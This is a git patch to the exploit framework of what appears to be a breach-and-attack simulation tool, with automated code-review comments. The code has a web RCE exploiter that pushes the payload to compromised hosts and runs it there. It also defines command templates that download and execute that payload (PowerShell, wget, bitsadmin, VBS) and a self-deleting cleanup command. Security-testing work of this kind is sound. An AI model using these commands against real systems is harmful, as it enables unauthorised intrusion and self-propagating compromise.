From 0d45a44d6b1600ef78da8d520898205a9b23c621 Mon Sep 17 00:00:00 2001
From: Vakaris
Date: Fri, 10 Aug 2018 15:07:56 +0300
Subject: [PATCH] Final, tested framework fixes
---
 infection_monkey/exploit/web_rce.py | 32 ++++++++++++++--------------
 infection_monkey/model/__init__.py | 3 +--
 2 files changed, 16 insertions(+), 19 deletions(-)
diff --git a/infection_monkey/exploit/web_rce.py b/infection_monkey/exploit/web_rce.py
index d3ae83b6d..f99e4da52 100644
--- a/infection_monkey/exploit/web_rce.py
+++ b/infection_monkey/exploit/web_rce.py
@@ -107,7 +107,6 @@ class WebRCE(HostExploiter):
 else:
 extensions = [""]
 for port in ports:
- extensions = [(e[1:] if '/' == e[0] else e) for e in extensions]
 for extension in extensions:
 if port[1]:
 protocol = "https"
@@ -127,9 +126,12 @@ class WebRCE(HostExploiter):
 resp = self.exploit(url, ARCH_LINUX)
 if resp:
 # Pulls architecture string
- # TODO TEST IF NOT FOUND
 arch = re.search('(?<=Architecture:)\s+(\w+)', resp)
- arch = arch.group(1)
+ try:
+ arch = arch.group(1)
+ except AttributeError:
+ LOG.error("Looked for linux architecture but could not find it")
+ return False
 if arch:
 return arch
 else:
@@ -167,7 +169,7 @@ class WebRCE(HostExploiter):
 else:
 paths.extend([self._config.dropper_target_path_win_32, self._config.dropper_target_path_win_64])
 for path in paths:
- if self.check_remote_file(url, path):
+ if self.check_remote_monkey_file(url, path):
 return True
 return False
 
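Review bot: Dropping the `extensions` normalisation at `@@ -107` removes the only line in this hunk that stripped a leading '/' before the URL is assembled further down, so an extension configured as `/path` would presumably now reach the URL builder (outside the hunk) unnormalised unless that code trims it; worth confirming. The removed line also indexed `e[0]` and would raise IndexError on the `[""]` default shown two lines above, which may be why it was deleted rather than fixed. If the normalisation is still wanted, a hoisted form above `for port in ports:` that is safe on the empty string is `extensions = [e[1:] if e.startswith('/') else e for e in extensions]`. The enclosing method starts and ends outside the hunk.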
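Review bot: The new try/except at `@@ -127` detects a failed regex match through the AttributeError raised by `None.group`; `re.search` returns None on no match, so `if arch is None:` followed by the LOG.error and `return False` states the condition directly and keeps `arch = arch.group(1)` out of a `try`. Once `group(1)` of `(\w+)` has succeeded it is never empty, so the unchanged `if arch:` / `else:` that follows is redundant after this change. The pattern is a non-raw string containing `\s` and `\w`; writing it as `r'(?<=Architecture:)\s+(\w+)'` avoids the invalid-escape warning on newer Pythons. Including the target in the message, `LOG.error("Looked for linux architecture on %r but could not find it", self.host)`, makes the failure attributable when several hosts are scanned.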
@@ -179,15 +181,15 @@ class WebRCE(HostExploiter):
 :param names: [] of service names. Example: ["http"]
 :return: Array of ports: [[80, False], [443, True]] or False. Port always consists of [ port.nr, IsHTTPS?]
 """
- ports = WebRCE.get_open_service_ports(self.host, ports, names)
+ ports = self.get_open_service_ports(ports, names)
 if not ports:
 LOG.info("All default web ports are closed on %r, skipping", host)
 return False
 else:
 return ports
 
- def set_host_arch(self, exploiter, url):
- arch = WebRCE.get_host_arch(exploiter, url)
+ def set_host_arch(self, url):
+ arch = self.get_host_arch(url)
 if not arch:
 LOG.error("Couldn't get host machine's architecture")
 return False
@@ -203,7 +205,7 @@ class WebRCE(HostExploiter):
 :return: {'response': response/False, 'path': monkeys_path_in_host}
 """
 LOG.info("Trying to upload monkey to the host.")
- src_path = get_target_monkey(host)
+ src_path = get_target_monkey(self.host)
 if not src_path:
 LOG.info("Can't find suitable monkey executable for host %r", host)
 return False
@@ -213,7 +215,7 @@ class WebRCE(HostExploiter):
 if not path:
 return False
 # Create server for http download and wait for it's startup.
- http_path, http_thread = HTTPTools.create_locked_transfer(host, src_path)
+ http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path)
 if not http_path:
 LOG.debug("Exploiter failed, http transfer creation failed.")
 return False
@@ -223,10 +225,9 @@ class WebRCE(HostExploiter):
 return False
 # Choose command:
 if commands:
- command = WebRCE.get_command(self.host, path, http_path, commands)
+ command = self.get_command(path, http_path, commands)
 else:
- command = WebRCE.get_command(self.host, path, http_path,
- {'windows': POWERSHELL_HTTP_UPLOAD, 'linux': WGET_HTTP_UPLOAD})
+ command = self.get_command(path, http_path, {'windows': POWERSHELL_HTTP_UPLOAD, 'linux': WGET_HTTP_UPLOAD})
 
 resp = self.exploit(url, command)
 
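Review bot: The failure-path log call at `@@ -179`, `LOG.info("All default web ports are closed on %r, skipping", host)`, still references a bare `host` while the line just above it is switched to `self.host`; unless `host` remains bound by the enclosing method's signature (which starts outside the hunk), that line raises NameError exactly when the ports are closed, turning a `return False` into a crash. The same pattern is left in the `@@ -203` hunk: `LOG.info("Can't find suitable monkey executable for host %r", host)`. Both should use `self.host`, e.g. `LOG.info("All default web ports are closed on %r, skipping", self.host)`. A test that only exercises the successful path would not reveal this.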
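Review bot: The rewritten `else:` branch at `@@ -223` folds the fallback command table into a single call well past the file's other line lengths, `command = self.get_command(path, http_path, {'windows': POWERSHELL_HTTP_UPLOAD, 'linux': WGET_HTTP_UPLOAD})`. The dict is a fixed default, so binding it once at module level under a constructed name such as `DEFAULT_UPLOAD_COMMANDS` and writing `command = self.get_command(path, http_path, commands or DEFAULT_UPLOAD_COMMANDS)` removes both the branch and the long line while keeping the same truthiness test. The enclosing method continues outside the hunk.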
@@ -283,10 +284,10 @@ class WebRCE(HostExploiter):
 LOG.info("Trying to execute remote monkey")
 # Get monkey command line
 if dropper and path:
- monkey_cmd = build_monkey_commandline(host, get_monkey_depth() - 1, path)
+ monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, path)
 command = RUN_MONKEY % {'monkey_path': path, 'monkey_type': DROPPER_ARG, 'parameters': monkey_cmd}
 else:
- monkey_cmd = build_monkey_commandline(host, get_monkey_depth() - 1)
+ monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1)
 command = RUN_MONKEY % {'monkey_path': path, 'monkey_type': MONKEY_ARG, 'parameters': monkey_cmd}
 try:
 resp = self.exploit(url, command)
@@ -306,6 +307,3 @@ class WebRCE(HostExploiter):
 return False
 LOG.info("Execution attempt finished")
 return resp
-
-
-
diff --git a/infection_monkey/model/__init__.py b/infection_monkey/model/__init__.py
index 31bc77eb8..8b4f8d4ab 100644
--- a/infection_monkey/model/__init__.py
+++ b/infection_monkey/model/__init__.py
@@ -17,8 +17,7 @@ RDP_CMDLINE_HTTP_VBS = 'set o=!TMP!\!RANDOM!.tmp&@echo Set objXMLHTTP=CreateObje
 DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(file_path)s exit)) > NUL 2>&1'
 
 # Commands used for downloading monkeys
-POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \\\'%(http_path)s\\\' -OutFile \\\'%(monkey_path)s\\\' -UseBasicParsing\""
-POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(monkey_path)s\' -UseBasicParsing\""
+POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(monkey_path)s\' -UseBasicParsing\""
 WGET_HTTP_UPLOAD = "wget -O %(monkey_path)s %(http_path)s"
 RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s'
 CHMOD_MONKEY = "chmod +x %(monkey_path)s"
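Review bot: In the `infection_monkey/model/__init__.py` hunk, `POWERSHELL_HTTP_UPLOAD` now carries plain single quotes around the substituted paths (`\'` inside a double-quoted Python literal is just `'`), and the `_NOT_ESCAPED` variant that previously held this form is removed; any remaining caller that chose the backslash-escaped form because its command passes through an additional quoting layer lies outside this diff, so it is worth confirming none does. Since `%(http_path)s` and `%(monkey_path)s` are interpolated into a command line that is executed on the remote side, the quoting contract should be stated next to the constant, e.g. `# Paths are wrapped in PowerShell single quotes; substituted values must not contain a single quote.` The same interpolation applies to the unchanged `WGET_HTTP_UPLOAD` and `RDP_CMDLINE_HTTP` lines.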